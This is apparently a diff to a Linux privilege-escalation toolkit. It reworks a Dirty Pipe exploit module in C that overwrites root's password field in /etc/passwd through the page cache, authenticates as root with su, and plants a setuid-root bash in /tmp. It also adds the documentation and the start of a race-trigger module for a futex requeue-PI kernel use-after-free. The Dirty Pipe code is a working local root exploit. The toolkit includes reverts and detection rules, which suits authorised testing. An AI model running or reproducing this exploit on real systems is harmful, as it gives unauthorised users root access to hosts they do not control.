/* Build replacement: zeros of the same length so we don't shift
|
||||
* the line layout. "0000" for a 4-digit UID, "00000" for 5, etc. */
|
||||
char replacement[16];
|
||||
memset(replacement, '0', uid_len);
|
||||
replacement[uid_len] = 0;
|
||||
|
||||
/* Edge case: if offset is page-aligned, splice/CAN_MERGE primitive
|
||||
* can't reach it (see prepare_pipe/dirty_pipe_write comments).
|
||||
* Vanishingly rare — first user in /etc/passwd typically lives
|
||||
* far past the file's first 4096 bytes. Refuse cleanly. */
|
||||
if ((uid_off & 0xfff) == 0) {
|
||||
fprintf(stderr, "[-] dirty_pipe: UID field is page-aligned; primitive can't write here\n");
|
||||
if ((field_off & 0xfff) == 0) {
|
||||
fprintf(stderr, "[-] dirty_pipe: root password field is page-aligned; "
|
||||
"primitive can't write here\n");
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
if (newlen > sizeof dp_orig || field_off + (off_t)newlen > (off_t)pw_sz) {
|
||||
fprintf(stderr, "[-] dirty_pipe: /etc/passwd too small to hold the payload "
|
||||
"without extending it (Dirty Pipe can't grow files)\n");
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] dirty_pipe: overwriting UID '%s' → '%s' via page-cache write\n",
|
||||
orig_uid, replacement);
|
||||
/* Save the original bytes we're about to clobber, for revert. */
|
||||
int fd = open("/etc/passwd", O_RDONLY);
|
||||
if (fd < 0) { perror("open passwd"); return SKELETONKEY_TEST_ERROR; }
|
||||
if (pread(fd, dp_orig, newlen, field_off) != (ssize_t)newlen) {
|
||||
close(fd); fprintf(stderr, "[-] dirty_pipe: pread backup failed\n");
|
||||
return SKELETONKEY_TEST_ERROR;
|
||||
}
|
||||
if (dirty_pipe_write("/etc/passwd", uid_off, replacement, uid_len) < 0) {
|
||||
close(fd);
|
||||
dp_orig_off = field_off; dp_orig_len = newlen;
|
||||
|
||||
/* Unique out-of-band artifacts. */
|
||||
long tag = (long)getpid();
|
||||
char proof[128], rootbash[128], cmd[1024];
|
||||
snprintf(proof, sizeof proof, "/tmp/.sk-dirtypipe-%ld.proof", tag);
|
||||
snprintf(rootbash, sizeof rootbash, "/tmp/.sk-dirtypipe-%ld.rootbash", tag);
|
||||
unlink(proof); unlink(rootbash);
|
||||
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] dirty_pipe: overwriting root's password field at offset "
|
||||
"%lld (len %zu) via page-cache write\n",
|
||||
(long long)field_off, newlen);
|
||||
if (dirty_pipe_write("/etc/passwd", field_off, newline, newlen) < 0) {
|
||||
fprintf(stderr, "[-] dirty_pipe: page-cache write failed\n");
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
dp_wrote = true;
|
||||
|
||||
if (ctx->no_shell) {
|
||||
fprintf(stderr, "[+] dirty_pipe: --no-shell — patch landed; not spawning su.\n"
|
||||
"[i] dirty_pipe: revert with `skeletonkey --cleanup dirty_pipe`\n");
|
||||
/* Authenticate as root with the known password and plant the proof. */
|
||||
snprintf(cmd, sizeof cmd,
|
||||
"id > %s 2>&1; cp -f /bin/bash %s 2>/dev/null; "
|
||||
"chown 0:0 %s %s 2>/dev/null; chmod 4755 %s 2>/dev/null; sync",
|
||||
proof, rootbash, rootbash, proof, rootbash);
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] dirty_pipe: authenticating as root (su + known password)\n");
|
||||
dp_su_root_run(cmd);
|
||||
|
||||
/* Revert the page cache IMMEDIATELY — before we even check the
|
||||
* result — so a running system is never left with a known root
|
||||
* password. Dirty Pipe never wrote disk, so this fully restores. */
|
||||
dp_revert();
|
||||
{ int ev = open("/etc/passwd", O_RDONLY); /* nudge a re-read */
|
||||
if (ev >= 0) { posix_fadvise(ev, 0, 0, POSIX_FADV_DONTNEED); close(ev); } }
|
||||
|
||||
/* Out-of-band verdict: is the proof a real, root-owned file? */
|
||||
struct stat sb;
|
||||
bool rooted = (stat(proof, &sb) == 0 && S_ISREG(sb.st_mode) && sb.st_uid == 0);
|
||||
if (rooted) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[+] dirty_pipe: ROOT — root-owned proof %s\n", proof);
|
||||
fprintf(stderr, "[+] dirty_pipe: setuid-root shell available: %s -p\n", rootbash);
|
||||
fprintf(stderr, "[i] dirty_pipe: /etc/passwd page cache reverted (nothing persisted)\n");
|
||||
}
|
||||
return SKELETONKEY_EXPLOIT_OK;
|
||||
}
|
||||
|
||||
/* /etc/passwd now reports our user as uid 0 (in the page cache).
|
||||
* `su` reads the page cache, sees uid 0, drops a root shell. */
|
||||
fprintf(stderr, "[+] dirty_pipe: page cache poisoned; spawning su to claim root\n");
|
||||
fflush(NULL);
|
||||
execlp("su", "su", pw->pw_name, "-c", "/bin/sh", (char *)NULL);
|
||||
/* If execlp returns, su didn't actually pop root — revert and report. */
|
||||
perror("execlp(su)");
|
||||
revert_passwd_page_cache();
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[-] dirty_pipe: no root artifact — honest EXPLOIT_FAIL "
|
||||
"(page cache reverted). The primitive may be blocked, or su/PAM "
|
||||
"rejected the injected hash.\n");
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
static skeletonkey_result_t dirty_pipe_cleanup(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] dirty_pipe: evicting /etc/passwd from page cache\n");
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] dirty_pipe: reverting /etc/passwd page cache + removing artifacts\n");
|
||||
dp_revert(); /* idempotent; no root / no drop_caches needed */
|
||||
if (system("rm -f /tmp/.sk-dirtypipe-*.proof /tmp/.sk-dirtypipe-*.rootbash 2>/dev/null") != 0) {
|
||||
/* harmless */
|
||||
}
|
||||
revert_passwd_page_cache();
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
@@ -522,7 +603,7 @@ const struct skeletonkey_module dirty_pipe_module = {
|
||||
.detect_sigma = dirty_pipe_sigma,
|
||||
.detect_yara = dirty_pipe_yara,
|
||||
.detect_falco = dirty_pipe_falco,
|
||||
.opsec_notes = "Creates a pipe, fills+drains to leave PIPE_BUF_FLAG_CAN_MERGE on every slot; finds the UID offset in /etc/passwd by parsing the file; splice(1 byte) from (target_offset-1) to inherit the stale flag, then write(pipe) with the all-zero payload - kernel merges into the file's page cache. Offset must be non-page-aligned and the write must fit in a single page. Audit-visible via splice(fd=/etc/passwd) + write from a non-root process. --active mode writes/reads /tmp/skeletonkey-dirty-pipe-probe-XXXXXX to verify. Cleanup callback evicts /etc/passwd via posix_fadvise + drop_caches.",
|
||||
.opsec_notes = "Creates a pipe, fills+drains to leave PIPE_BUF_FLAG_CAN_MERGE on every slot; splice(1 byte) from (target_offset-1) on /etc/passwd to inherit the stale flag, then write(pipe) so the payload merges into the file's page cache. Overwrites root's password field with a known crypt hash (clobbers into following lines transiently), authenticates as root over a pty via su, plants a root-owned proof + setuid bash under /tmp, then reverts the page cache by writing the original bytes back through the same primitive (no root / no drop_caches needed — nothing persists; Dirty Pipe never wrote disk). Offset must be non-page-aligned and each write must fit a single page. Very audit-visible: splice(fd=/etc/passwd) + write from a non-root process, then su spawning as root. --active mode writes/reads /tmp/skeletonkey-dirty-pipe-probe-XXXXXX to confirm the primitive. cleanup() re-reverts idempotently and removes the /tmp artifacts.",
|
||||
.arch_support = "x86_64+unverified-arm64",
|
||||
};
|
||||
|
||||
|
||||
@@ -0,0 +1,123 @@
|
||||
# ghostlock — CVE-2026-43499
|
||||
|
||||
"GhostLock" — a race-condition use-after-free on **kernel stack** memory in
|
||||
the Linux rtmutex / futex requeue-PI code path (`kernel/locking/rtmutex.c`),
|
||||
reachable by **any unprivileged local user** (CVSS PR:L). No user namespace,
|
||||
no capability, no special `CONFIG` beyond `CONFIG_FUTEX_PI` (universally
|
||||
enabled). It has existed since PI-futex requeue landed — **~15 years, across
|
||||
every distribution** — which is what makes it remarkable.
|
||||
|
||||
## The bug
|
||||
|
||||
On the deadlock-rollback path, `remove_waiter()` operates on `current`
|
||||
instead of the actual waiter task while unwinding a proxy lock in
|
||||
`rt_mutex_start_proxy_lock()` — reached from `futex_requeue()`. If a
|
||||
concurrent PI-chain priority walk (driven from another CPU via
|
||||
`sched_setattr()`) runs at that instant, `pi_blocked_on` is cleared on the
|
||||
**wrong** task and an on-stack `struct rt_mutex_waiter` is left dangling in a
|
||||
task's waiter / pi tree. When the kernel later rotates that rbtree over the
|
||||
(now-reused) stack frame, the forged node fields become a controlled kernel
|
||||
write → use-after-free.
|
||||
|
||||
The public research + PoC ("IonStack part II: GhostLock", VEGA / Nebula
|
||||
Security) builds the requeue-PI cycle so `FUTEX_CMP_REQUEUE_PI` hits
|
||||
`-EDEADLK` (the rollback) while a sibling-core consumer thread hammers
|
||||
`sched_setattr(SCHED_BATCH)` on the waiter's tid to win the race. A separate
|
||||
full Android/Pixel LPE then forges the on-stack `rt_mutex_waiter` on a leaked
|
||||
kernel page (the "KernelSnitch" futex-bucket timing side channel), overwrites
|
||||
a `struct file` `f_op` → configfs/ashmem arbitrary R/W → pipe physical R/W →
|
||||
cred patch → root. ~**97% stable** on kernelCTF; Google awarded **$92,337**.
|
||||
|
||||
## Affected range
|
||||
|
||||
| | |
|
||||
|---|---|
|
||||
| Introduced | PI-futex requeue — **2.6.39** (commit `8161239a8bcc`) |
|
||||
| Fixed upstream | commit `3bfdc63936dd` ("rtmutex: Use waiter::task instead of current in remove_waiter()") — merged **7.1-rc1** |
|
||||
| Stable backports | **7.0.4** · 6.18.27 · **6.12.86** (LTS) · **6.6.140** (LTS) · **6.1.175** (LTS) |
|
||||
| Affected, no upstream fix | **5.15.x / 5.10.x / 5.4.x / 4.19.x** (kernel CNA lists no stable fix) |
|
||||
| Not affected | < 2.6.39 (predates PI-futex requeue) |
|
||||
| NVD class | CWE-416 (Use After Free) via CWE-362 (race); CVSS 7.8, PR:L |
|
||||
| CISA KEV | no (brand new) |
|
||||
|
||||
The `kernel_range` table carries one entry per backported branch;
|
||||
`kernel_range_is_patched()` marks any branch strictly newer than all of them
|
||||
(7.1+) patched-via-mainline and everything below the on-branch threshold
|
||||
vulnerable — including the 5.x LTS lines that have no published fix. Extend
|
||||
the table as more branches backport (the drift checker flags them). Source:
|
||||
the Linux kernel CNA record (`git.kernel.org/stable/c/<hash>`), corroborated
|
||||
by the Debian / Ubuntu / SUSE trackers.
|
||||
|
||||
## Trigger / detection
|
||||
|
||||
`detect()` is a **pure version gate** — no active probe, because there is no
|
||||
cheap, safe way to distinguish vulnerable from patched without winning the
|
||||
race. It returns `OK` below 2.6.39 or on a patched kernel, and `VULNERABLE`
|
||||
in range. `CONFIG_FUTEX_PI` is a (near-universal) precondition detect()
|
||||
**assumes** rather than probes; there is no userns / capability precondition
|
||||
(any local user — CVSS PR:L).
|
||||
|
||||
`exploit()` forks an isolated child and runs two phases:
|
||||
|
||||
- **(A) deterministic + safe** — builds the requeue-PI cycle (a waiter
|
||||
holding a "chain" PI-futex and parked in `FUTEX_WAIT_REQUEUE_PI`; an owner
|
||||
holding the "target" PI-futex and blocked on the chain) and fires
|
||||
`FUTEX_CMP_REQUEUE_PI`, confirming the kernel returns **-EDEADLK**. That
|
||||
proves the `remove_waiter()` rollback path — where the bug lives — is
|
||||
reachable here. Without a concurrent priority walk the rollback is the
|
||||
kernel's normal, correct deadlock rejection: it creates no dangling
|
||||
pointer, so this phase is safe on any kernel. *(Validated on real hardware:
|
||||
the cycle returns `-EDEADLK` deterministically.)*
|
||||
- **(B) hard-bounded window exercise** — repeats (A) a small, wall-clock-
|
||||
capped number of times (24 iterations / 2 s) with a sibling-CPU
|
||||
`sched_setattr(SCHED_BATCH)` storm on the waiter's tid, overlapping the
|
||||
priority walk with the rollback (the actual race). Then it stops.
|
||||
|
||||
It is **deliberately under-driven**. A *won* race corrupts the kernel
|
||||
**stack** and drives a near-arbitrary pointer write — near-certain panic on a
|
||||
vulnerable host. So this module does **not** widen the `copy_from_user`
|
||||
window (no memfd / `PUNCH_HOLE`), does **not** spray or reoccupy the freed
|
||||
stack frame, and does **not** bundle the KernelSnitch leak → forged-waiter →
|
||||
fops/configfs/ashmem/pipe R/W → cred-patch chain (Android/Pixel-specific,
|
||||
per-build offsets). The trigger is **reconstructed from the public PoC and is
|
||||
not VM-verified**. It returns `EXPLOIT_FAIL` and never claims root it did not
|
||||
get.
|
||||
|
||||
Because a kernel race that corrupts the stack is the least predictable class
|
||||
in the corpus, `ghostlock` carries the **lowest `--auto` safety rank** (11 —
|
||||
just below `bad_epoll`), so `--auto` only reaches for it after every safer
|
||||
vulnerable module.
|
||||
|
||||
## Detection — better than most kernel races, but read this
|
||||
|
||||
Unlike `bad_epoll` (whose epoll syscalls are indistinguishable from every
|
||||
event loop), GhostLock has a **genuinely distinctive tell**: a futex
|
||||
requeue-PI op (`FUTEX_WAIT_REQUEUE_PI` / `FUTEX_CMP_REQUEUE_PI`) returning
|
||||
`-EDEADLK`, which glibc's requeue-PI usage inside `pthread_cond_wait` never
|
||||
provokes, interleaved with `sched_setattr(SCHED_BATCH)` on a **sibling
|
||||
thread** and `sched_setaffinity` CPU pinning. The catch: auditd/sigma see the
|
||||
`futex` syscall but not its op-vs-return cheaply, and a bare `-S futex` watch
|
||||
would flood any host. So:
|
||||
|
||||
- **auditd / sigma** anchor on the far rarer `sched_setattr` /
|
||||
`sched_setaffinity` drivers plus the post-exploitation euid-0 transition.
|
||||
- **falco / eBPF** carries the high-fidelity rule (futex requeue-PI returns
|
||||
`EDEADLK` + sibling `sched_setattr`) — it can see the op and the return
|
||||
value.
|
||||
|
||||
There is no yara rule (in-kernel race, no file artifact). Tune the
|
||||
`sched_setattr` anchor per environment — real-time and scheduler-tuning
|
||||
daemons will false-positive.
|
||||
|
||||
## Fix / mitigation
|
||||
|
||||
Upgrade the kernel (>= 7.0.4 / 6.12.86 / 6.6.140 / 6.1.175 on-branch, or
|
||||
7.1+). There is **no partial mitigation**: PI futexes cannot be disabled at
|
||||
runtime, and no `unprivileged_userns_clone` / sysctl toggle closes this path.
|
||||
`mitigate()` is `NULL` for that reason.
|
||||
|
||||
## Credit
|
||||
|
||||
Discovery, research, and the public PoC: **VEGA / Nebula Security**
|
||||
(`@nebusecurity`, nebusec.ai). Upstream fix `3bfdc63936dd` (Keenan Dong /
|
||||
Thomas Gleixner). See `NOTICE.md`.
|
||||
@@ -0,0 +1,76 @@
|
||||
# NOTICE — ghostlock (CVE-2026-43499)
|
||||
|
||||
## Vulnerability
|
||||
|
||||
**CVE-2026-43499** — "GhostLock", a **race-condition use-after-free** on
|
||||
kernel **stack** memory in the Linux rtmutex / futex requeue-PI path
|
||||
(`kernel/locking/rtmutex.c`). On the deadlock-rollback path,
|
||||
`remove_waiter()` operates on `current` instead of the actual waiter task
|
||||
while unwinding a proxy lock in `rt_mutex_start_proxy_lock()` (reached from
|
||||
`futex_requeue()`); a concurrent PI-chain priority walk driven via
|
||||
`sched_setattr()` on another CPU clears `pi_blocked_on` on the wrong task and
|
||||
leaves an on-stack `struct rt_mutex_waiter` dangling → UAF when the kernel
|
||||
later rotates the rbtree over the reused stack frame.
|
||||
|
||||
The bug is reachable by **any unprivileged local user** (CVSS 7.8, PR:L) —
|
||||
`futex(2)` + `sched_setattr(2)`, no capability, no user namespace, no special
|
||||
config beyond `CONFIG_FUTEX_PI` (universally enabled). It has existed since
|
||||
PI-futex requeue landed in **2.6.39** — ~15 years across every distribution.
|
||||
NVD class: **CWE-416** (Use After Free), with a **CWE-362** race root cause.
|
||||
**Not** in CISA KEV (brand new).
|
||||
|
||||
## Research credit
|
||||
|
||||
- **Discovery, research, and public PoC** by **VEGA / Nebula Security**
|
||||
(`@nebusecurity`, <https://nebusec.ai>), published as "IonStack part II:
|
||||
GhostLock" (<https://nebusec.ai/research/ionstack-part-2/>). Exploit code:
|
||||
<https://github.com/NebuSec/CyberMeowfia> (`IonStack/CVE-2026-43499`,
|
||||
Apache-2.0). Awarded **$92,337** in Google's kernelCTF for a ~97%-stable
|
||||
privilege escalation / container escape. SKELETONKEY's trigger
|
||||
reconstruction is informed by the public PoC's requeue-PI cycle shape only
|
||||
— no KernelSnitch offsets, forged-waiter field layout, or ROP / cred-patch
|
||||
arithmetic is reused.
|
||||
- **Introduced** with PI-futex requeue in **2.6.39** (commit
|
||||
`8161239a8bcc`).
|
||||
- **Fixed upstream** by commit
|
||||
`3bfdc63936dd4773109b7b8c280c0f3b5ae7d349` ("rtmutex: Use waiter::task
|
||||
instead of current in remove_waiter()", Keenan Dong / Thomas Gleixner),
|
||||
merged for **7.1-rc1**; stable backports **7.0.4 / 6.18.27 / 6.12.86 /
|
||||
6.6.140 / 6.1.175**.
|
||||
- Authoritative backport versions: the Linux kernel CNA record
|
||||
(<https://cveawg.mitre.org/api/cve/CVE-2026-43499>,
|
||||
`git.kernel.org/stable/c/<hash>`), corroborated by the Debian
|
||||
(<https://security-tracker.debian.org/tracker/CVE-2026-43499>), Ubuntu, and
|
||||
SUSE trackers. The **5.15 / 5.10 / 5.4 / 4.19** LTS branches are affected
|
||||
with no upstream stable fix published at time of writing.
|
||||
|
||||
All credit for finding, analysing, and exploiting this bug belongs to VEGA /
|
||||
Nebula Security and to the upstream maintainers who fixed it. SKELETONKEY is
|
||||
the bundling and bookkeeping layer only.
|
||||
|
||||
## SKELETONKEY role
|
||||
|
||||
🟡 **Trigger (reconstructed) — reachability-only, not VM-verified.** This is
|
||||
the corpus's first rtmutex / futex-PI module and its cleanest example of a
|
||||
kernel-**stack** UAF (every other UAF in the corpus is heap/slab). Shipped on
|
||||
the same "fire the bug class and stop" contract as `stackrot`
|
||||
(CVE-2023-3269), `nft_catchall` (CVE-2026-23111), and `bad_epoll`
|
||||
(CVE-2026-46242).
|
||||
|
||||
`detect()` is a pure kernel-version gate (vulnerable iff `>= 2.6.39` and below
|
||||
the on-branch fix; backports 7.0.4 / 6.18.27 / 6.12.86 / 6.6.140 / 6.1.175,
|
||||
7.1+ inherits mainline; 5.15/5.10/5.4/4.19 affected with no upstream fix) — no
|
||||
userns or CONFIG probe (`CONFIG_FUTEX_PI` assumed, near-universal).
|
||||
`exploit()` forks an isolated child that confirms the `-EDEADLK`
|
||||
`remove_waiter()` rollback path is reachable (deterministic, safe) and then
|
||||
exercises the actual race a hard-bounded 24 iterations / 2 s with a
|
||||
sibling-CPU `sched_setattr(SCHED_BATCH)` storm, and stops.
|
||||
|
||||
It is **deliberately under-driven**: a won race corrupts the kernel stack and
|
||||
drives a near-arbitrary pointer write (near-certain panic), so the module does
|
||||
not widen the `copy_from_user` window, does not spray/reoccupy the freed
|
||||
frame, and does not bundle the KernelSnitch leak → forged on-stack
|
||||
`rt_mutex_waiter` → fops/configfs/ashmem/pipe R/W → cred-patch root-pop
|
||||
(Android/Pixel-specific, per-build offsets). The trigger is reconstructed from
|
||||
the public PoC, not VM-verified — it never claims root it did not get. It
|
||||
carries the lowest `--auto` safety rank in the corpus.
|
||||
@@ -0,0 +1,567 @@
|
||||
/*
|
||||
* ghostlock_cve_2026_43499 — SKELETONKEY module
|
||||
*
|
||||
* CVE-2026-43499 — "GhostLock", a race-condition use-after-free on kernel
|
||||
* STACK memory in the Linux rtmutex / futex requeue-PI code path
|
||||
* (kernel/locking/rtmutex.c). On the deadlock-rollback path,
|
||||
* remove_waiter() operates on `current` instead of the actual waiter task
|
||||
* while unwinding a proxy lock in rt_mutex_start_proxy_lock() — reached
|
||||
* from futex_requeue(). If a concurrent PI-chain priority walk (driven
|
||||
* from another CPU via sched_setattr()) runs at that instant,
|
||||
* `pi_blocked_on` is cleared on the WRONG task and an on-stack
|
||||
* `struct rt_mutex_waiter` is left dangling in a task's waiter / pi tree.
|
||||
* When the kernel later rotates that rbtree over the (now-reused) stack
|
||||
* frame, the forged node fields become a controlled kernel write → UAF.
|
||||
* Reachable by ANY unprivileged local user (CVSS PR:L): plain futex(2) +
|
||||
* sched_setattr(2), no user namespace, no capability, no special CONFIG
|
||||
* beyond CONFIG_FUTEX_PI (universally enabled). The bug has existed since
|
||||
* PI-futex requeue landed — ~15 years, across every distribution.
|
||||
*
|
||||
* Public research + PoC — "IonStack part II: GhostLock" by VEGA / Nebula
|
||||
* Security (https://nebusec.ai/research/ionstack-part-2/; code at
|
||||
* https://github.com/NebuSec/CyberMeowfia, Apache-2.0). A portable crash
|
||||
* PoC drives the -EDEADLK rollback while a sibling-core consumer thread
|
||||
* fires sched_setattr(SCHED_BATCH) to win the race; a separate full
|
||||
* Android/Pixel LPE then forges the on-stack rt_mutex_waiter on a leaked
|
||||
* kernel page (the "KernelSnitch" futex-bucket timing side channel),
|
||||
* overwrites a struct file f_op → configfs/ashmem arbitrary R/W → pipe
|
||||
* physical R/W → cred patch → root. ~97% stable on kernelCTF; Google
|
||||
* awarded $92,337.
|
||||
*
|
||||
* CWE-416 (Use After Free) via CWE-362 (race). CVSS 7.8 (PR:L). Introduced
|
||||
* ~2.6.39 (PI-futex requeue); fixed by commit 3bfdc63936dd ("rtmutex: Use
|
||||
* waiter::task instead of current in remove_waiter()") merged for 7.1-rc1;
|
||||
* stable backports 7.0.4 / 6.18.27 / 6.12.86 / 6.6.140 / 6.1.175. The
|
||||
* 5.15 / 5.10 / 5.4 / 4.19 LTS branches are AFFECTED with no upstream
|
||||
* stable fix published at time of writing. NOT in CISA KEV (brand new).
|
||||
*
|
||||
* STATUS: 🟡 TRIGGER (reconstructed) — reachability-only, NOT VM-verified.
|
||||
* exploit() forks an isolated child that, in two phases:
|
||||
* (A) DETERMINISTIC + SAFE — builds the requeue-PI cycle (a waiter
|
||||
* holding a "chain" PI-futex and parked in FUTEX_WAIT_REQUEUE_PI;
|
||||
* an owner holding the "target" PI-futex and blocked on the chain)
|
||||
* and fires FUTEX_CMP_REQUEUE_PI, confirming the kernel returns
|
||||
* -EDEADLK. That -EDEADLK proves the remove_waiter() deadlock-
|
||||
* rollback path (where the bug lives) is REACHABLE on this host.
|
||||
* With no concurrent priority walk, the rollback is the kernel's
|
||||
* normal, correct deadlock rejection — it creates no dangling
|
||||
* pointer, so this phase is safe on any kernel.
|
||||
* (B) HARD-BOUNDED window exercise — repeats (A) a small, wall-clock-
|
||||
* capped number of times with a sibling-core consumer thread
|
||||
* hammering sched_setattr(SCHED_BATCH) on the waiter's tid, so the
|
||||
* PI-chain priority walk overlaps the rollback (the actual race).
|
||||
* Then it STOPS. It deliberately OMITS the memfd/PUNCH_HOLE
|
||||
* copy_from_user widening and the kernel-stack spray that make a
|
||||
* win likely, does NOT reoccupy the freed frame, and does NOT
|
||||
* bundle the KernelSnitch leak → forged-waiter → fops/configfs/
|
||||
* ashmem/pipe R/W → cred-patch chain (Android/Pixel-specific,
|
||||
* per-build offsets). It returns EXPLOIT_FAIL and never claims
|
||||
* root it did not get.
|
||||
* A *won* race here corrupts the kernel STACK and drives a near-arbitrary
|
||||
* pointer write — near-certain panic on a vulnerable host — which is why
|
||||
* this carries the lowest --auto safety rank in the corpus (see
|
||||
* module_safety_rank() in skeletonkey.c).
|
||||
*
|
||||
* detect() is a pure version gate: vulnerable iff the running kernel is
|
||||
* >= 2.6.39 (when PI-futex requeue arrived) AND below the fix on its
|
||||
* branch. CONFIG_FUTEX_PI is a (near-universal) precondition that
|
||||
* detect() ASSUMES rather than probes — no distro tracker publishes a
|
||||
* CONFIG gate and /proc/config.gz is often absent; there is likewise no
|
||||
* userns / capability precondition (CVSS PR:L, any local user).
|
||||
*
|
||||
* arch_support: any — the bug and this reachability probe are arch-neutral
|
||||
* (futex / sched_setattr / pthreads); only the public *weaponization* is
|
||||
* arm64/Android-specific, and none of it is bundled here.
|
||||
*/
|
||||
|
||||
#include "skeletonkey_modules.h"
|
||||
#include "../../core/registry.h"
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <stdbool.h>
|
||||
#include <unistd.h>
|
||||
|
||||
#ifdef __linux__
|
||||
|
||||
#include "../../core/kernel_range.h"
|
||||
#include "../../core/host.h"
|
||||
|
||||
#include <stdint.h>
|
||||
#include <stdatomic.h>
|
||||
#include <errno.h>
|
||||
#include <time.h>
|
||||
#include <sched.h>
|
||||
#include <pthread.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/syscall.h>
|
||||
|
||||
/* futex operation constants — define defensively; <linux/futex.h> is not
|
||||
* always present and can clash with libc headers. */
|
||||
#ifndef FUTEX_LOCK_PI
|
||||
#define FUTEX_LOCK_PI 6
|
||||
#endif
|
||||
#ifndef FUTEX_UNLOCK_PI
|
||||
#define FUTEX_UNLOCK_PI 7
|
||||
#endif
|
||||
#ifndef FUTEX_WAIT_REQUEUE_PI
|
||||
#define FUTEX_WAIT_REQUEUE_PI 11
|
||||
#endif
|
||||
#ifndef FUTEX_CMP_REQUEUE_PI
|
||||
#define FUTEX_CMP_REQUEUE_PI 12
|
||||
#endif
|
||||
#ifndef FUTEX_CLOCK_REALTIME
|
||||
#define FUTEX_CLOCK_REALTIME 256
|
||||
#endif
|
||||
#ifndef SCHED_BATCH
|
||||
#define SCHED_BATCH 3
|
||||
#endif
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* Kernel-range table. Mainline fix landed in 7.1-rc1 (3bfdc63936dd);
|
||||
* stable backports shipped per LTS branch below. A branch with an exact
|
||||
* entry is patched iff host.patch >= entry.patch; any branch strictly
|
||||
* newer than EVERY entry (i.e. 7.1+) is patched-via-mainline; every other
|
||||
* branch (5.4/5.10/5.15 — affected, no upstream fix — and the EOL lines
|
||||
* 6.2..6.5 / 6.7..6.11 / 6.13..6.17 / 6.19 / 7.0.<4) is still vulnerable.
|
||||
* kernel_range_is_patched() implements exactly that. Extend the table as
|
||||
* more branches publish backports (the drift checker flags them).
|
||||
* Authoritative source: the Linux kernel CNA record (git.kernel.org
|
||||
* /stable/c/<hash>), corroborated by Debian/Ubuntu/SUSE trackers.
|
||||
* ------------------------------------------------------------------ */
|
||||
static const struct kernel_patched_from ghostlock_patched_branches[] = {
|
||||
{6, 1, 175}, /* 6.1 LTS — d8cce4773c2b */
|
||||
{6, 6, 140}, /* 6.6 LTS — 8a1fc8d698ac */
|
||||
{6, 12, 86}, /* 6.12 LTS — 6d52dfcb2a5d */
|
||||
{6, 18, 27}, /* 6.18 — 3fb7394a8377 */
|
||||
{7, 0, 4}, /* 7.0 — 88614876370a; 7.1+ inherits the mainline fix */
|
||||
};
|
||||
|
||||
static const struct kernel_range ghostlock_range = {
|
||||
.patched_from = ghostlock_patched_branches,
|
||||
.n_patched_from = sizeof(ghostlock_patched_branches) /
|
||||
sizeof(ghostlock_patched_branches[0]),
|
||||
};
|
||||
|
||||
static skeletonkey_result_t ghostlock_detect(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
|
||||
if (!v || v->major == 0) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[!] ghostlock: host fingerprint missing kernel "
|
||||
"version — bailing\n");
|
||||
return SKELETONKEY_TEST_ERROR;
|
||||
}
|
||||
|
||||
/* PI-futex requeue (and thus the vulnerable rt_mutex_start_proxy_lock
|
||||
* / remove_waiter rollback) arrived in 2.6.39; older kernels predate
|
||||
* the code entirely. (In practice nothing modern is below this, but
|
||||
* the gate is here for correctness.) */
|
||||
if (!skeletonkey_host_kernel_at_least(ctx->host, 2, 6, 39)) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] ghostlock: kernel %s predates PI-futex requeue "
|
||||
"(introduced 2.6.39) — not affected\n", v->release);
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
if (kernel_range_is_patched(&ghostlock_range, v)) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[+] ghostlock: kernel %s is patched (>= 7.0.4 / "
|
||||
"6.12.86 / 6.6.140 / 6.1.175 on-branch, or 7.1+ "
|
||||
"mainline)\n", v->release);
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[!] ghostlock: VULNERABLE — kernel %s below the fix on "
|
||||
"its branch; rtmutex/futex requeue-PI remove_waiter() "
|
||||
"stack UAF reachable by any unprivileged user (no userns "
|
||||
"/ capability; assumes CONFIG_FUTEX_PI, near-universal)\n",
|
||||
v->release);
|
||||
fprintf(stderr, "[i] ghostlock: no unprivileged-userns or sysctl stopgap "
|
||||
"applies (PI futexes cannot be disabled at runtime) — the "
|
||||
"only fix is to patch the kernel\n");
|
||||
}
|
||||
return SKELETONKEY_VULNERABLE;
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* Reconstructed reachability trigger (deliberately under-driven).
|
||||
*
|
||||
* Faithful minimal shape of the public PoC's requeue-PI cycle:
|
||||
* waiter : LOCK_PI(chain); WAIT_REQUEUE_PI(wait -> target) [parks]
|
||||
* owner : LOCK_PI(target); LOCK_PI(chain) [blocks]
|
||||
* main : CMP_REQUEUE_PI(wait -> target) => -EDEADLK
|
||||
* The requeue would make the waiter block on `target` (held by owner),
|
||||
* owner is blocked on `chain` (held by waiter) → cycle → rt_mutex
|
||||
* deadlock detection returns -EDEADLK and runs remove_waiter() rollback.
|
||||
*
|
||||
* Phase A (no consumer) confirms that rollback path is REACHABLE — safe,
|
||||
* because without a concurrent PI priority walk the unwind is the normal
|
||||
* correct deadlock rejection and leaves nothing dangling. Phase B adds a
|
||||
* sibling-core sched_setattr(SCHED_BATCH) storm on the waiter's tid to
|
||||
